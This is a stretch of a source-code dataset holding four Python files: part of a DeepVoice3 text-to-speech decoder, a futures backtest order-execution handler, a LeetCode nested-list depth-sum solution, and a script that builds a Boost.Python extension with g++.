position_encoding_init(\n max_positions, embed_dim, position_rate=key_position_rate)\n\n self.fc1 = Linear(in_channels, convolutions[0][0], dropout=dropout)\n in_channels = convolutions[0][0]\n\n # Causual convolutions\n self.projections = nn.ModuleList()\n self.convolutions = nn.ModuleList()\n self.attention = nn.ModuleList()\n\n Conv1dLayer = Conv1d if has_dilation(convolutions) else LinearizedConv1d\n\n for i, (out_channels, kernel_size, dilation) in enumerate(convolutions):\n pad = (kernel_size - 1) * dilation\n dilation = (dilation,)\n self.projections.append(Linear(in_channels, out_channels)\n if in_channels != out_channels else None)\n self.convolutions.append(\n Conv1dLayer(in_channels, out_channels * 2, kernel_size,\n padding=pad, dilation=dilation, dropout=dropout))\n self.attention.append(AttentionLayer(out_channels, embed_dim,\n dropout=dropout)\n if attention[i] else None)\n in_channels = out_channels\n self.fc2 = Linear(in_channels, in_dim * r)\n\n # decoder states -> Done binary flag\n self.fc3 = Linear(in_channels, 1)\n\n self._is_inference_incremental = False\n self.max_decoder_steps = 200\n self.min_decoder_steps = 10\n self.use_memory_mask = use_memory_mask\n if isinstance(force_monotonic_attention, bool):\n self.force_monotonic_attention = \\\n [force_monotonic_attention] * len(convolutions)\n else:\n self.force_monotonic_attention = force_monotonic_attention\n\n def forward(self, encoder_out, inputs=None,\n text_positions=None, frame_positions=None,\n speaker_embed=None, lengths=None):\n\n if inputs is None:\n assert text_positions is not None\n self._start_incremental_inference()\n outputs = self._incremental_forward(encoder_out, text_positions)\n self._stop_incremental_inference()\n return outputs\n\n # Grouping multiple frames if necessary\n if inputs.size(-1) == self.in_dim:\n inputs = inputs.view(inputs.size(0), inputs.size(1) // self.r, -1)\n assert inputs.size(-1) == self.in_dim * self.r\n\n keys, values = encoder_out\n\n if self.use_memory_mask and lengths is not None:\n mask = get_mask_from_lengths(keys, lengths)\n else:\n mask = None\n\n # position encodings\n if text_positions is not None:\n text_pos_embed = self.embed_keys_positions(text_positions)\n keys += text_pos_embed\n if frame_positions is not None:\n frame_pos_embed = self.embed_query_positions(frame_positions)\n\n # transpose only once to speed up attention layers\n keys = keys.transpose(1, 2).contiguous()\n\n x = inputs\n x = F.dropout(x, p=self.dropout, training=self.training)\n\n # project to size of convolution\n x = F.relu(self.fc1(x), inplace=False)\n\n use_convtbc = isinstance(self.convolutions[0], _ConvTBC)\n # TBC case: B x T x C -> T x B x C\n # Generic case: B x T x C -> B x C x T\n x = x.transpose(0, 1) if use_convtbc else x.transpose(1, 2)\n\n # temporal convolutions\n alignments = []\n for idx, (proj, conv, attention) in enumerate(zip(\n self.projections, self.convolutions, self.attention)):\n residual = x if proj is None else proj(x)\n if idx > 0:\n x = F.dropout(x, p=self.dropout, training=self.training)\n x = conv(x)\n splitdim = -1 if use_convtbc else 1\n if use_convtbc:\n x = conv.remove_future_timesteps(x)\n else:\n x = x[:, :, :residual.size(-1)]\n a, b = x.split(x.size(splitdim) // 2, dim=splitdim)\n x = a * F.sigmoid(b)\n\n # Feed conv output to attention layer as query\n if attention is not None:\n # (B x T x C)\n x = x.transpose(1, 0) if use_convtbc else x.transpose(1, 2)\n x = x if frame_positions is None else x + frame_pos_embed\n x, alignment = attention(x, (keys, values), mask=mask)\n # (T x B x C)\n x = x.transpose(1, 0) if use_convtbc else x.transpose(1, 2)\n alignments += [alignment]\n\n # residual\n x = (x + residual) * math.sqrt(0.5)\n\n # Back to batch first\n x = x.transpose(0, 1) if use_convtbc else x.transpose(1, 2)\n\n # well, I'm not sure this is really necesasary\n decoder_states = x\n\n # project to mel-spectorgram\n x = F.sigmoid(self.fc2(decoder_states))\n\n # Done flag\n done = F.sigmoid(self.fc3(decoder_states))\n\n return x, torch.stack(alignments), done, decoder_states\n\n def incremental_inference(self, beam_size=None):\n \"\"\"Context manager for incremental inference.\n This provides an optimized forward pass for incremental inference\n (i.e., it predicts one time step at a time). If the input order changes\n between time steps, call model.decoder.reorder_incremental_state to\n update the relevant buffers. To generate a fresh sequence, first call\n model.decoder.start_fresh_sequence.\n Usage:\n ```\n with model.decoder.incremental_inference():\n for step in range(maxlen):\n out = model.decoder(tokens[:, :step], positions[:, :step],\n encoder_out)\n probs = F.log_softmax(out[:, -1, :])\n ```\n \"\"\"\n class IncrementalInference(object):\n\n def __init__(self, decoder, beam_size):\n self.decoder = decoder\n self.beam_size = beam_size\n\n def __enter__(self):\n self.decoder._start_incremental_inference(self.beam_size)\n\n def __exit__(self, *args):\n self.decoder._stop_incremental_inference()\n\n return IncrementalInference(self, beam_size)\n\n def _start_incremental_inference(self):\n assert not self._is_inference_incremental, \\\n 'already performing incremental inference'\n self._is_inference_incremental = True\n\n # save original forward\n self._orig_forward = self.forward\n\n # switch to incremental forward\n self.forward = self._incremental_forward\n\n # start a fresh sequence\n self.start_fresh_sequence()\n\n def _stop_incremental_inference(self):\n # restore original forward\n self.forward = self._orig_forward\n\n self._is_inference_incremental = False\n\n def _incremental_forward(self, encoder_out, text_positions,\n initial_input=None, test_inputs=None):\n assert self._is_inference_incremental\n\n keys, values = encoder_out\n B = keys.size(0)\n\n # position encodings\n text_pos_embed = self.embed_keys_positions(text_positions)\n keys += text_pos_embed\n\n # transpose only once to speed up attention layers\n keys = keys.transpose(1, 2).contiguous()\n\n decoder_states = []\n outputs = []\n alignments = []\n dones = []\n # intially set to zeros\n last_attended = [None] * len(self.attention)\n for idx, v in enumerate(self.force_monotonic_attention):\n last_attended[idx] = 0 if v else None\n\n num_attention_layers = sum([layer is not None for layer in self.attention])\n t = 0\n if initial_input is None:\n initial_input = Variable(\n keys.data.new(B, 1, self.in_dim * self.r).zero_())\n current_input = initial_input\n while True:\n frame_pos = Variable(keys.data.new(B, 1).zero_().add_(t + 1)).long()\n frame_pos_embed = self.embed_query_positions(frame_pos)\n\n if test_inputs is not None:\n if t >= test_inputs.size(1):\n break\n current_input = test_inputs[:, t, :].unsqueeze(1)\n else:\n if t > 0:\n current_input = outputs[-1]\n x = current_input\n x = F.dropout(x, p=self.dropout, training=self.training)\n\n # project to size of convolution\n x = F.relu(self.fc1(x), inplace=False)\n\n # temporal convolutions\n ave_alignment = None\n for idx, (proj, conv, attention) in enumerate(zip(\n self.projections, self.convolutions, self.attention)):\n residual = x if proj is None else proj(x)\n if idx > 0:\n x = F.dropout(x, p=self.dropout, training=self.training)\n x = conv.incremental_forward(x)\n a, b = x.split(x.size(-1) // 2, dim=-1)\n x = a * F.sigmoid(b)\n\n # attention\n if attention is not None:\n x = x + frame_pos_embed\n x, alignment = attention(x, (keys, values),\n last_attended=last_attended[idx])\n if self.force_monotonic_attention:\n last_attended[idx] = alignment.max(-1)[1].view(-1).data[0]\n if ave_alignment is None:\n ave_alignment = alignment\n else:\n ave_alignment = ave_alignment + ave_alignment\n\n # residual\n x = (x + residual) * math.sqrt(0.5)\n\n ave_alignment = ave_alignment.div_(num_attention_layers)\n decoder_state = x\n\n output = F.sigmoid(self.fc2(decoder_state))\n\n # Done flag\n done = F.sigmoid(self.fc3(decoder_state))\n\n outputs += [output]\n decoder_states += [decoder_state]\n alignments += [ave_alignment]\n dones += [done]\n\n t += 1\n if (done > 0.5).all() and t > self.min_decoder_steps:\n break\n elif t > self.max_decoder_steps:\n print(\"Warning! doesn't seems to be converged\")\n break\n\n # Remove 1-element time axis\n alignments = list(map(lambda x: x.squeeze(1), alignments))\n decoder_states = list(map(lambda x: x.squeeze(1), decoder_states))\n outputs = list(map(lambda x: x.squeeze(1), outputs))\n\n # Combine outputs for all time steps\n alignments = torch.stack(alignments).transpose(0, 1)\n decoder_states = torch.stack(decoder_states).transpose(0, 1).contiguous()\n outputs = torch.stack(outputs).transpose(0, 1).contiguous()\n\n return outputs, alignments, dones, decoder_states\n\n def start_fresh_sequence(self):\n \"\"\"Clear all state used for incremental generation.\n **For incremental inference only**\n This should be called before generating a fresh sequence.\n beam_size is required if using BeamableMM.\n \"\"\"\n if self._is_inference_incremental:\n self.prev_state = None\n for conv in self.convolutions:\n conv.clear_buffer()\n\n\nclass Converter(nn.Module):\n def __init__(self, in_dim, out_dim, convolutions=((256, 5, 1),) * 4, dropout=0.1):\n super(Converter, self).__init__()\n self.dropout = dropout\n self.in_dim = in_dim\n self.out_dim = out_dim\n\n # Non-causual convolutions\n in_channels = convolutions[0][0]\n self.fc1 = Linear(in_dim, in_channels)\n self.projections = nn.ModuleList()\n self.convolutions = nn.ModuleList()\n\n Conv1dLayer = Conv1d if has_dilation(convolutions) else ConvTBC\n for (out_channels, kernel_size, dilation) in convolutions:\n pad = (kernel_size - 1) // 2 * dilation\n dilation = (dilation,)\n self.projections.append(Linear(in_channels, out_channels)\n if in_channels != out_channels else None)\n self.convolutions.append(\n Conv1dLayer(in_channels, out_channels * 2, kernel_size,\n padding=pad, dilation=dilation, dropout=dropout))\n in_channels = out_channels\n self.fc2 = Linear(in_channels, out_dim)\n\n def forward(self, x):\n # project to size of convolution\n x = F.relu(self.fc1(x), inplace=False)\n\n use_convtbc = isinstance(self.convolutions[0], _ConvTBC)\n # TBC case: B x T x C -> T x B x C\n # Generic case: B x T x C -> B x C x T\n x = x.transpose(0, 1) if use_convtbc else x.transpose(1, 2)\n\n # 1D conv blocks\n for idx, (proj, conv) in enumerate(zip(self.projections, self.convolutions)):\n residual = x if proj is None else proj(x)\n if idx > 0:\n x = F.dropout(x, p=self.dropout, training=self.training)\n x = conv(x)\n splitdim = -1 if use_convtbc else 1\n a, b = x.split(x.size(splitdim) // 2, dim=splitdim)\n x = a * F.sigmoid(b)\n x = (x + residual) * math.sqrt(0.5)\n\n # Back to batch first\n x = x.transpose(0, 1) if use_convtbc else x.transpose(1, 2)\n\n return F.sigmoid(self.fc2(x))\n","sub_path":"deepvoice3_pytorch/deepvoice3.py","file_name":"deepvoice3.py","file_ext":"py","file_size_in_byte":28626,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"161168040","text":"import logging\nimport random\nimport numpy as np\nimport datetime as dt\nfrom data_utils.quantgo_utils import get_data_multi\nfrom events import CMEBacktestFillEvent\nfrom trading.execution import ExecutionHandler\nlogging.basicConfig(level=logging.INFO, format='%(asctime)s: %(message)s')\nlog = logging.getLogger('Backtest')\n\n\nCME_HISTORICAL_ORDER_DELAY = dt.timedelta(seconds=.01)\nCME_HISTORICAL_TRANSACTION_COST = 0\nMARKET_ORDERS = True\nLIMIT_FILL_PROBABILITY = 0.1\n\n\nclass BacktestExecution(ExecutionHandler):\n def __init__(self, events, products, second_bars=True, commission=None):\n super(BacktestExecution, self).__init__(events)\n self.products = products\n self.second_bars = second_bars\n self.commission = commission if commission is not None else CME_HISTORICAL_TRANSACTION_COST\n self.resting_orders = []\n self.curr_day_data = None\n\n def process_new_order(self, order_event):\n \"\"\"\n Updates the current_day_data and places the order.\n :param order_event: (OrderEvent)\n \"\"\"\n self._check_day_data(order_event.order_time)\n self.place_order(order_event)\n\n def process_resting_orders(self, market_event):\n \"\"\"\n On new market update, check resting orders to see if they can be filled.\n :param market_event:\n \"\"\"\n if not self.resting_orders:\n return\n for resting_order in self.resting_orders:\n fill_time = self._get_fill_time(market_event.datetime, resting_order.symbol)\n direction = self._get_order_direction(resting_order)\n if direction is 1:\n if self._check_fill_limit_buy(resting_order, fill_time) is True:\n self._fill_limit_order(resting_order, fill_time)\n self.resting_orders.remove(resting_order)\n elif direction is -1:\n if self._check_fill_limit_sell(resting_order, fill_time) is True:\n self._fill_limit_order(resting_order, fill_time)\n self.resting_orders.remove(resting_order)\n\n def place_order(self, order_event):\n \"\"\"\n Places a MARKET/LIMIT order.\n :param order_event:\n \"\"\"\n self._check_day_data(order_event.order_time)\n if order_event.order_type == 'MARKET':\n self._fill_market_order(order_event)\n elif order_event.order_type == 'LIMIT':\n if self._check_limit_order(order_event, order_event.order_time):\n pass\n self.resting_orders.append(order_event)\n\n def _check_limit_order(self, order_event, dt):\n pass\n\n def _fill_market_order(self, order_event):\n \"\"\"\n Fills a market order by crossing the spread at the current best bid/offer\n \"\"\"\n if order_event.quantity == 0:\n return\n fill_time = self._get_fill_time(order_event.order_time, order_event.symbol)\n sym_data = self.curr_day_data[order_event.symbol]\n direction = self._get_order_direction(order_event)\n if direction == 1:\n fill_price = sym_data['level_1_price_sell'].asof(fill_time)\n self.create_fill_event(order_event, fill_price, fill_time)\n elif direction == -1:\n fill_price = sym_data['level_1_price_buy'].asof(fill_time)\n self.create_fill_event(order_event, fill_price, fill_time)\n\n def _fill_limit_order(self, order_event, fill_time):\n if order_event.quantity == 0:\n return\n direction = self._get_order_direction(order_event)\n sym_data = self.curr_day_data[order_event.symbol]\n if direction == 1:\n fill_price = sym_data['level_1_price_buy'].asof(fill_time)\n self.create_fill_event(order_event, fill_price, fill_time)\n elif direction == -1:\n fill_price = sym_data['level_1_price_sell'].asof(fill_time)\n self.create_fill_event(order_event, fill_price, fill_time)\n\n def _check_fill_limit_buy(self, resting_order, fill_time):\n \"\"\"\n Conditions to fill a limit order (BUY)\n \"\"\"\n symbol = resting_order.symbol\n if resting_order.price < self.curr_day_data[symbol]['level_1_price_sell'].asof(fill_time) and \\\n self._limit_fill() is True or \\\n resting_order.price >= self.curr_day_data[symbol]['level_1_price_sell'].asof(fill_time):\n return True\n return False\n\n def _check_fill_limit_sell(self, resting_order, fill_time):\n \"\"\"\n Conditions to fill a limit order (SELL)\n \"\"\"\n if resting_order.price > self.curr_day_data['level_1_price_buy'].asof(fill_time) and \\\n self._limit_fill() is True or \\\n resting_order.price <= self.curr_day_data['level_1_price_buy'].asof(fill_time):\n return True\n return False\n\n def clear_resting_orders(self):\n if len(self.resting_orders) > 0:\n self.resting_orders = []\n\n def _get_fill_time(self, order_time, symbol):\n \"\"\"\n Applies a delay to the order_time and returns the time of the data for which the order can be filled.\n \"\"\"\n execution_time = order_time + CME_HISTORICAL_ORDER_DELAY\n fill_time = self.curr_day_data[symbol].index.asof(execution_time)\n return fill_time\n\n def create_fill_event(self, order_event, fill_price, fill_time):\n fill_cost = float(order_event.quantity*fill_price)\n fill_event = CMEBacktestFillEvent(order_event.order_time, fill_time, order_event.symbol,\n order_event.quantity, fill_price, fill_cost,\n commission=self.commission)\n self.events.put(fill_event)\n\n def _check_day_data(self, datetime):\n \"\"\"\n Check if data for the current day (based on orders) exists, if not, get the data.\n On a new day change, clears all resting orders.\n \"\"\"\n if self.curr_day_data is None or self.compare_dates(self.curr_day_data.index[0], datetime) is False:\n date = dt.datetime(year=datetime.year, month=datetime.month, day=datetime.day)\n symbols = [product.symbol for product in self.products]\n self.curr_day_data = get_data_multi(symbols, date, second_bars=self.second_bars)\n self.clear_resting_orders()\n\n @staticmethod\n def _get_order_direction(order_event):\n \"\"\"\n Returns the direction of the order:\n 1: BUY\n -1: SELL\n \"\"\"\n return np.sign(order_event.quantity)\n\n @staticmethod\n def compare_dates(dt1, dt2):\n \"\"\"\n Check if datetime dates are the same.\n :param dt1: (DateTime)\n :param dt2: (DateTime)\n :return: (bool)\n \"\"\"\n return dt1.year == dt2.year and dt1.month == dt2.month and dt1.day == dt2.day\n\n @staticmethod\n def _limit_fill():\n \"\"\"\n Probability function for limit fill.\n \"\"\"\n z = random.randint(0, 10)\n if z/10.0 < LIMIT_FILL_PROBABILITY:\n return True\n else:\n return False\n","sub_path":"backtest/execution.py","file_name":"execution.py","file_ext":"py","file_size_in_byte":7134,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"75632452","text":"# 题目给出一个列表。该列表中的每个元素都是nestedList对象。每个nestedList对象可以是单个数字,也可以是列表,也可以是列表再内嵌列表。\n# 题目要求返回列表中所有元素的总和。每个元素的和为该元素值 * 该元素的深度\n# 题目对NestedInteger这个对象实现几个方法。\n# 我们将用到的是:\n# isInteger(self), 返回该对象是否为单个数字。True为是,False为lie\n# getInteger(self), 如果对象所含为单个数字,则返回数字。否则为list的情况,返回None\n# getList(self), 如果对象所含为一个列表,则返回该列表。否则为数字的情况,返回None\n\n\n# 方法1: 递归调用DFS\n# 时间复杂度:O(N), N为列表中嵌套的数组次数 + 数字的数量。\n# 空间复杂度:O(N), DFS中stack最多嵌套N层。\nclass Solution:\n def depthSum(self, nestedList: List[NestedInteger]) -> int:\n # DFS\n def getSum(nestList, level):\n # 局部变量result记录相加结果\n result = 0\n # 轮训列表\n for element in nestList:\n # 判断是否为单个数字\n if element.isInteger():\n # 如果为单个数字,加入结果\n result += element.getInteger() * level\n else:\n # 如果为list, 递归调用,并且递归调用的时候level + 1\n result += getSum(element.getList(), level + 1)\n # 返回局部结果\n return result\n\n return getSum(nestedList, 1)\n\n","sub_path":"面试-LeetCode题/基础算法3-DFS深度优先搜索/LeetCode339(NestedListWeightSum)/Solution.py","file_name":"Solution.py","file_ext":"py","file_size_in_byte":1602,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"634736022","text":"from subprocess import call as shell_call\nfrom distutils import sysconfig\nimport scitbx\n\nobj_name = \"img_stream_ext\"\npy_inc_path = sysconfig.get_python_inc()\nprint(\"\\n sysconfig.get_python_inc() =\", py_inc_path)\nfor pos, single_shar in enumerate(py_inc_path):\n if(single_shar == \"/\" ):\n cut_py_inc_path = py_inc_path[0:pos]\n\nscitbx_path = scitbx.__path__[0]\nprint(\"\\n scitbx_path =\", scitbx_path)\ncut_scitbx_path = scitbx_path[0:-6]\nprint(\"cut_scitbx_path =\", cut_scitbx_path)\n\ndict_conf_vars = sysconfig.get_config_vars()\nprint(\"\\n\", dict_conf_vars[\"prefix\"])\nprefix_path = dict_conf_vars[\"prefix\"]\ncut_prefix = prefix_path[0:-10]\nprint(\"cut_prefix =\", cut_prefix)\ninc_path = cut_prefix + \"build/include\"\nprint(\"inc_path =\", inc_path)\n\ncom_lin_01 = \"g++ -I\" + py_inc_path \\\n + \" -I\" + cut_py_inc_path + \" -fPIC -c \" \\\n + \" -I\" + cut_scitbx_path \\\n + \" -I\" + inc_path \\\n + \" \" + obj_name + \".cpp\"\n\nlib_path = sysconfig.get_python_lib()\n\nfor pos, single_shar in enumerate(lib_path):\n if(single_shar == \"/\" ):\n cut_lib_path = lib_path[0:pos]\n\nfor pos, single_shar in enumerate(cut_lib_path):\n if(single_shar == \"/\" ):\n cut_cut_lib_path = cut_lib_path[0:pos]\n\n\ncom_lin_02 = \"g++ -shared \" + obj_name + \".o -L\" + \\\n cut_cut_lib_path + \" -lboost_python38 -L\" + \\\n cut_lib_path + \"/config -lpython3.8 -o \" + obj_name + \".so\"\n\nprint(\"\\n Compiling line 1:\")\nprint(\"cmd =\", com_lin_01, \"\\n\")\nerr_msg_01 = shell_call(com_lin_01, shell=True)\nprint(\"\\n Compiling line 2:\")\nprint(\"cmd =\", com_lin_02, \"\\n\")\nerr_msg_02 = shell_call(com_lin_02, shell=True)\nprint(\"\\n Done compiling\")\n\nif(err_msg_01 != 0 or err_msg_02 !=0 ):\n print(\"Failed to compile some C++ extensions \")\n","sub_path":"lui_testing/py3_pyside2_n_dui2/imgs_n_numpy_n_sockets/flex_arr_01/compyling_boost_ext.py","file_name":"compyling_boost_ext.py","file_ext":"py","file_size_in_byte":1718,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"}